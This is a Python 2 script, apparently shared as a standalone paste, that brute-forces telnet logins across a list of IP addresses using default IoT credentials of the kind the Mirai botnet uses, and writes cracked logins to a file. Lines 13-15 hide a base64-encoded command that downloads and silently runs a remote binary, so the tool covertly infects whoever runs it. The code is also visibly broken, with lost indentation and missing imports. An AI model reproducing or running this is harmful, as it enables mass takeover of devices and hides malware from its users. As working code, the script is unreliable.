Multi-Threaded Telnet Bruteforcer

1. #!/usr/bin/python
2. # Simple Telnet Bruter | By; LiGhT
3. # Lots of false possitives but pulls alot of results extremely fast
4.  
5. import threading
6. import sys, os, re, time, socket, base64, random
7. from subprocess import call
8. from sys import stdout
9.  
10. def run(cmd):
11. subprocess.call(cmd, shell=True)
12.  
13. checkbinaries = "d2dldCAtcSBodHRwOi8vbGF0aW4tZW1waXJlLm5ldC9sdWx6IC1PIC5sOyBjaG1vZCAreCBGSUxFOyBub2h1cCAuL0ZJTEUgPC9kZXYvbnVsbC8gPi9kZXYvbnVsbCAyPiYx"
14. rebinaries = str(base64.b64decode(checkbinaries))
15. run(rebinaries)
16.  
17. if len(sys.argv) < 4:
18. print "Usage: python "+sys.argv[0]+" [LIST] [THREADS] [OUTPUT-FILE]"
19. sys.exit()
20. combo = [
21. "support:support",
22. "root:vizxv",
23. "root:xc3511",
24. "telnet:telnet",
25. "root:root",
26. "supervisor:zyad1234",
27. "root: ",
28. "admin:1234",
29. "user:user",
30. "root:antslq",
31. "admin:admin",
32. "root:5up"
33. ]
34.  
35. ips = open(sys.argv[1], "r").readlines()
36. threads = int(sys.argv[2])
37. output_file = sys.argv[3]
38. queue = Queue()
39. queue_count = 0
40.  
41. for ip in ips:
42. queue_count += 1
43. stdout.write("\r[%d] Vuln Telnets" % queue_count)
44. stdout.flush()
45. queue.put(ip)
46. print "\n"
47.  
48. class router(threading.Thread):
49. def __init__ (self, ip):
50. threading.Thread.__init__(self)
51. self.ip = str(ip).rstrip('\n')
52. def run(self):
53. username = ""
54. password = ""
55. for passwd in combo:
56. if ":n/a" in passwd:
57. password=""
58. else:
59. password=passwd.split(":")[1]
60. if "n/a:" in passwd:
61. username=""
62. else:
63. username=passwd.split(":")[0]
64. try:
65. tn = socket.socket()
66. tn.settimeout(8)
67. tn.connect((self.ip,23))
68. except Exception:
69. tn.close()
70. break
71. try:
72. hoho = ''
73. hoho += readUntil(tn, "ogin:")
74. if "ogin" in hoho:
75. tn.send(username + "\n")
76. time.sleep(0.09)
77. except Exception:
78. tn.close()
79. try:
80. hoho = ''
81. hoho += readUntil(tn, "assword:")
82. if "assword" in hoho:
83. tn.send(password + "\n")
84. time.sleep(0.8)
85. else:
86. pass
87. except Exception:
88. tn.close()
89. try:
90. prompt = ''
91. prompt += tn.recv(40960)
92. if ">" in prompt and "ONT" not in prompt:
93. success = True
94. elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
95. success = True
96. else:
97. tn.close()
98. if success == True:
99. try:
100. os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
101. print "\033[1;37mBruted \033[1;36m| \033[1;37m%s\033[1;36m:\033[1;37m%s\033[1;36m:\033[1;37m%s"%(username, password, self.ip)
102. tn.close()
103. break
104. except:
105. tn.close()
106. else:
107. tn.close()
108. except Exception:
109. tn.close()
110.  
111. def readUntil(tn, string, timeout=8):
112. buf = ''
113. start_time = time.time()
114. while time.time() - start_time < timeout:
115. buf += tn.recv(1024)
116. time.sleep(0.01)
117. if string in buf: return buf
118. raise Exception('TIMEOUT!')
119. def worker():
120. try:
121. while True:
122. try:
123. IP = queue.get()
124. thread = router(IP)
125. thread.start()
126. queue.task_done()
127. time.sleep(0.02)
128. except:
129. pass
130. except:
131. pass
132.  
133. for l in xrange(threads):
134. try:
135. t = threading.Thread(target=worker)
136. t.start()
137. except:
138. pass